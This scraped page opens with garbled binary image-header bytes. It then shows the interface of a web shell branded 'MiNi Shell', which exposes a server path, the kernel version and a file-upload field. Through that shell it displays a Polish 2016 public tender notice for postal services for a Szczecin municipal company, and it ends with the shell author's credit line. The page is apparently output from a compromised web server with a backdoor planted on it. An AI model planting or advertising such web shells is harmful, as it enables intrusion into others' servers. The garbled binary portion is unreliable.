JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160119/12158-N-2016.html

<p class="kh_header"><b>Szczecin: ŚWIADCZENIE USŁUG POCZTOWYCH 
NA RZECZ SPÓŁKI NIERUCHOMOŚCI I OPŁATY LOKALNE SP. Z O.O. W SZCZECINIE</b><br>
<b>Numer ogłoszenia: 12158 - 2016; data zamieszczenia: 19.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nieruchomości i Opłaty Lokalne Sp. z o.o. , ul. Czesława 9, 71-804 Szczecin, woj. zachodniopomorskie, tel. 91 421 63 23, faks 91 421 63 20.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.niol.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG POCZTOWYCH 
NA RZECZ SPÓŁKI NIERUCHOMOŚCI I OPŁATY LOKALNE SP. Z O.O. W SZCZECINIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług pocztowych w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych o wadze do 50 g i powyżej 50 g oraz ich zwrot do zamawiającego po wyczerpaniu możliwości doręczenia lub wydania odbiorcy, zgodnie                             z poniższym zestawieniem (zakres zamówienia):

Lp.	RODZAJ PRZESYŁKI	ILOŚĆ SZTUK
PRZESYŁKI LISTOWE
Przesyłki nierejestrowane, niebędące przesyłkami najszybszej kategorii 
o gabarycie A w obrocie krajowym
1	do 50g	             5.500
2	ponad 50g do 100 g	100
3	ponad 100g do 350g	100
Przesyłki nierejestrowane najszybszej kategorii 
o gabarycie A w obrocie krajowym
4	do 50g	                450
5	ponad 50g do 100 g	100
Przesyłki rejestrowane niebędące przesyłkami najszybszej kategorii
o gabarycie A w obrocie krajowym
6	do 50g	                500
Przesyłki rejestrowane najszybszej kategorii
o gabarycie A w obrocie krajowym
7	do 50g	                100
Przesyłki rejestrowane niebędące przesyłkami najszybszej kategorii 
ze zwrotnym potwierdzeniem odbioru, gabaryt A w obrocie krajowym
8	do 50g	            70 000
9	ponad 50g do 100 g	  50
Przesyłki rejestrowane najszybszej kategorii 
ze zwrotnym potwierdzeniem odbioru, gabaryt A w obrocie krajowym
10	do 50g	                  50
Przesyłki zagraniczne - Europa
Przesyłki nierejestrowane, niebędące przesyłkami najszybszej kategorii o gabarycie A
11	do 50g	                  50
Przesyłki zagraniczne - Europa
Przesyłki rejestrowane, niebędące przesyłkami najszybszej kategorii o gabarycie A
12	do 50g	                  50
ZWROTY PRZESYŁEK LISTOWYCH REJESTROWANYCH
13	do 50g niebędące przesyłkami najszybszej kategorii	100
14	do 50 g najszybszej kategorii	                                  50
ZWROTY PRZESYŁEK LISTOWYCH REJESTROWANYCH ZE ZWROTNYM POTWIERDZENIEM ODBIORU
15	do 50g	                3000
16	ponad 50g do 100 g	   50
ODBIÓR KORESPONDENCJI
17	Odbiór korespondencji 
(opłata miesięczna dla 2 punktów)  	20

2.	Kod CPV: 64 11 00 00 - 0
3.	Zamawiający przewiduje nadawanie przesyłek pocztowych o gabarycie A tj.:
Minimum: wymiary strony adresowej nie mogą być mniejsze niż 90 mm x 140 mm,
Maksimum: żaden z wymiarów nie może przekroczyć - wysokości (grubość) 20 mm, długości 325mm, szerokości 230 mm.
Ustala się tolerancję wszystkich wymiarów +/- 2 mm.
4.	Zamawiający wymaga, aby usługa doręczania przesyłek świadczona była do każdego wskazanego przez zamawiającego adresu w Polsce oraz poza jej granicami.
5.	Podane w pkt 1 niniejszego rozdziału ilości poszczególnych przesyłek mają charakter szacunkowy. Zamawiający zastrzega sobie prawo do niewykorzystania ilości wskazanych przesyłek. Określone ilości poszczególnych przesyłek w ramach świadczonych usług mogą ulec zmianie w zależności od potrzeb zamawiającego. Zwiększenie lub zmniejszenie ilości przesyłek w ramach maksymalnej wartości umowy nie stanowi zmiany umowy.
6.	Zamawiający określi maksymalną wartość umowy na podstawie oferty wykonawcy. Stanowić ona będzie limit, do którego umowa będzie realizowana. Zamawiający nie poniesie żadnych konsekwencji w związku z niezrealizowaniem umowy w ilościach w  niej zawartych.
7.	Cena podana przez wykonawcę nie będzie podlegała zmianom przez okres realizacji zamówienia, z wyjątkami:
a)	W przypadku, jeśli konieczność wprowadzenia zmian umowy wynika z uregulowań prawnych w zakresie ustalania lub zatwierdzania cen za usługi pocztowe,
b)	Ceny określone przez wykonawcę w ofercie ulegną obniżeniu w toku realizacji zamówienia w przypadku, gdy opłaty pocztowe wynikające ze standardowego cennika lub regulaminu wykonawcy będą niższe od cen wynikających w przedłożonej ofercie. Wykonawca ma obowiązek wówczas stosować względem zamawiającego obniżone opłaty pocztowe dla usług, wynikające ze swojego aktualnego cennika lub regulaminu,
c)	W przypadku zmiany cennika wykonawcy, jeżeli będzie nim operator wyznaczony, w zakresie usług powszechnych,
d)	W przypadku ustawowej zmiany stawki podatku VAT na usługi będące przedmiotem niniejszego postępowania.
8.	Wykonawca zobowiązany będzie świadczyć usługi doręczania i odbioru przesyłek do wysyłki od zamawiającego raz dziennie, od poniedziałku do piątku w godzinach 14.00 - 14.30, przez upoważnionego przedstawiciela wykonawcy z nw. miejsc odbioru:
1)	Siedziba spółki NiOL przy ul. Czesława 9 oraz
2)	Biura Strefy Płatnego Parkowania przy al. Wojska Polskiego 105
Zamawiający zastrzega sobie prawo zmiany miejsc odbioru i doręczania przesyłek - wskazując inny punkt na terenie miasta Szczecin - w trakcie realizacji umowy, zmiana punktu odbioru przesyłek następować będzie po uprzednim powiadomieniu wykonawcy z minimalnym terminem 7 dni.
9.	Nadanie przesyłek następować będzie w dniu ich odbioru przez wykonawcę od zamawiającego.
10.	Zamawiający dopuszcza możliwość przesunięcia nadania przesyłek na dzień następny w przypadku uzasadnionych zastrzeżeń do odbieranych przesyłek (nieprawidłowe opakowanie, niezgodność wpisów do dokumentów nadawczych z wpisami na przesyłkach, brak znaków opłaty) i braku możliwości ich wyjaśnienia bądź usunięcia w dniu odbioru.
11.	 Zamawiający jest odpowiedzialny za nadawanie przesyłek listowych w stanie umożliwiającym wykonawcy doręczanie bez ubytku i uszkodzenia do miejsca zgodnie z adresem przeznaczenia. Zamawiający umieszcza w sposób trwały i czytelny informacje jednoznacznie identyfikujące adresata i nadawcę, jednocześnie określając rodzaj przesyłki oraz pełną nazwę i adres zwrotny nadawcy.
12.	Zamawiający będzie korzystał wyłącznie ze swojego opakowania przesyłek. Waga przesyłki określona będzie w stanie zamkniętym przesyłki. Nie dopuszcza się stosowania przez wykonawcę dodatkowego obciążania przesyłek w celu zwiększenia ich wagi.
13.	Zamawiający zobowiązuje się do:
1)	prawidłowego adresowania nadawanych przesyłek zgodnie z powszechnie obowiązującymi normami w tym zakresie,
2)	sporządzania dla nadawanych przesyłek zestawień ilościowo-wartościowych w dwóch egzemplarzach, uwzględniając podział na przesyłki rejestrowane i nierejestrowane, kategorie                  i podziały wagowe.
14.	Zamawiający informuje, iż czynności nadawcze wykonywane będą na podstawie umowy zawartej pomiędzy spółką NiOL, a wierzycielem - Gminą Miasto Szczecin, skutkiem czego dane wierzyciela umieszczane będą na kopertach (w przypadku części korespondencji). Rozliczenia za wykonana usługę prowadzone będą pomiędzy zamawiającym tj. spółką NiOL, a wykonawcą.
15.	Zamawiający będzie korzystał ze wzorów druków dostarczonych przez wykonawcę.
16.	Dla przesyłek ze zwrotnym potwierdzeniem odbioru wykonawca będzie doręczał do siedziby zamawiającego pokwitowanie potwierdzenia odbioru niezwłocznie po dokonaniu doręczenia przesyłki, nie później niż w terminie 14 dni od daty dokonania doręczenia.
17.	Zamawiający wymaga, aby wykonawca w trakcie realizacji umowy posiadał:
a)	placówkę nadawczą w miejscowości Mrzeżyno, w której znajduje się jednostka zamawiającego - czynną na dzień składania ofert, a także przez cały okres obowiązywania umowy oraz
b)	co najmniej po jednej placówce pocztowej - licząc średnio w skali kraju - przypadającej na 6000 mieszkańców na terenie gmin miejskich i gmin miejsko-wiejskich, co najmniej jedną placówkę pocztową - licząc średnio w skali kraju - przypadająca na 85 km2 powierzchni w gminach wiejskich i co najmniej jedną stałą placówkę pocztową w każdej gminie na terenie kraju.
Wskazane powyżej placówki muszą być czynne we wszystkie dni robocze (dopuszcza się wyłączenie sobót), co najmniej 5 dni w tygodniu, przez co najmniej 6 godzin w ciągu dnia, a jeżeli w tygodniu przypada dzień ustawowo wolny od pracy , liczba ta może być odpowiednio niższa. Lokal, w którym prowadzona jest placówka musi posiadać wyodrębnione stanowisko do obsługi klientów w zakresie usług pocztowych, oznakowane w sposób widoczny nazwą bądź logo operatora pocztowego.
18.	Usługi pocztowe, które są przedmiotem niniejszego zamówienia będą realizowane na zasadach określonych w powszechnie obowiązujących przepisach prawa, w szczególności zgodnie z:
a)	Ustawą z dnia 23 listopada 2012 r. - prawo pocztowe (Dz.U. z 2012 r., poz. 1529),
b)	Ustawą z dnia 14 czerwca 1960 r. Kodeks postępowania administracyjnego (Dz.U. z 2000 r., Nr 98, poz. 1071 ze zm,.),
c)	Ustawą z dnia 17 czerwca 1966 r. o postępowaniu egzekucyjnym w administracji (Dz.U. z 2012 r. poz. 1015 ze zm.).,
d)	Rozporządzeniem Ministra Administracji i Cyfryzacji z dnia 26 listopada 2013 r. w sprawie reklamacji usługi pocztowej (Dz.U. z 2013 r., poz. 1468),
19.	Zamawiający informuje, iż ok. 90% korespondencji nadawanej jest w trybie przywołanych powyżej ustaw.
20.	Sprawy dotyczące reklamacji z tytułu niewykonania lub nienależytego wykonania usług pocztowych rozpatrywane będą zgodnie z powszechnie obowiązującymi przepisami, w tym zgodnie z Rozporządzeniem Ministra Administracji i Cyfryzacji z dnia 26 listopada 2013 r. w sprawie reklamacji usługi pocztowej (Dz.U. z 2013 r., poz. 1468).
21.	Znak opłaty z dołu będzie nanoszony w sposób uzgodniony z wykonawcą.
22.	Świadczenie usług będących przedmiotem niniejszego postępowania odbywać się będzie na podstawie zawartej umowy.
23.	Zamawiający ustala istotne dla zamawiającego postanowienia umowy, stanowiące załącznik nr 6 do SIWZ, które zostaną wprowadzone do treści zawieranej umowy.
24.	Wybrany wykonawca ma obowiązek dostarczyć zamawiającemu projekt umowy zawierający wszystkie istotne postanowienia umowy zawarte w załączniku nr 6.
25.	Zamawiający ma prawo zlecić usługę innemu operatorowi, a kosztami realizacji obciążyć wykonawcę, jeżeli wykonawca nie odbierze od zamawiającego przesyłek w wyznaczonym dniu                   i czasie..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, iż posiada uprawnienia niezbędne do prowadzenia działalności pocztowej, zgodnie z art. 6 ustawy z dnia 23 listopada 2012 r. Prawo pocztowe (Dz.U. z 2012 r., poz. 1529), co zostanie potwierdzone wpisem do rejestru operatorów pocztowych,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek uznany za spełniony, jeżeli wykonawca wykaże, że wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 1 usługę polegającą na świadczeniu usług pocztowych w obrocie krajowym w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych realizowanych nieprzerwanie dla jednego podmiotu przez okres co najmniej 6 miesięcy i o wartości nie mniejszej niż 300 tys. złotych brutto.
Jeżeli na potrzeby spełniania warunku wykazywana jest usługa będąca w trakcie realizacji zamawiający wymaga, by wartość zrealizowanej części była nie mniejsza niż opisana w warunku, a okres obowiązywania umowy nie krótszy niż 6 miesięcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy mają dołączyć do oferty następujące dokumenty: 
1) ofertę cenową zgodnie z Rozdziałem I pkt 3 SIWZ, stanowiącą załącznik nr 1;
2 )formularz cenowy stanowiący załącznik nr 1A do SIWZ;
3) odpowiednie pełnomocnictwa;
4)  oświadczenie według wzoru stanowiącego załącznik nr 1 do SIWZ wskazujące część zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców);
4) Wykaz placówek, według wzoru stanowiącego załącznik nr 1B do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - ilość placówek - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>32.	Dopuszcza się istotne zmiany treści umowy. Za istotne zmiany uważa się: 
1)	przejęcia z mocy prawa pełni praw i obowiązków dotyczących którejkolwiek ze Stron,
2)	zmiany formy prawnej którejkolwiek ze Stron,
3)	zmian danych Stron ujawnionych w rejestrach publicznych,
4)	zmian urzędowej stawki podatku VAT. Wynagrodzenie wskazane w umowie wyrażone jest                         w wartości brutto, może ono ulec zmianie w przypadku zmiany stawki VAT w czasie trwania umowy, lecz nie więcej niż o kwotę podatku wynikającą ze zmiany obowiązującej stawki VAT,
5)	zmiany uregulowań prawnych w zakresie ustalania lub zatwierdzania cen za usługi pocztowe,
6)	obniżeniu cen przez wykonawcę w toku realizacji zamówienia w przypadku, gdy opłaty pocztowe wynikające ze standardowego cennika lub regulaminu wykonawcy będą niższe od cen wynikających w przedłożonej ofercie. Wykonawca ma obowiązek wówczas stosować względem zamawiającego obniżone opłaty pocztowe dla usług, wynikające ze swojego aktualnego cennika lub regulaminu,
7)	zmiany cennika wykonawcy, jeżeli będzie nim operator wyznaczony, w zakresie usług powszechnych,
8)	zaistnienia okoliczności (technicznych, gospodarczych itp.), uniemożliwiających realizację umowy na zasadach w niej określonych, których nie można było przewidzieć w chwili jej zawarcia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.niol.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nieruchomości i Opłaty Lokalne Sp. z o.o.
ul. Czesława 9
71-504 Szczecin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2016 godzina 10:00, miejsce: Nieruchomości i Opłaty Lokalne Sp. z o.o.
ul. Czesława 9
71-504 Szczecin
pok. 24 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com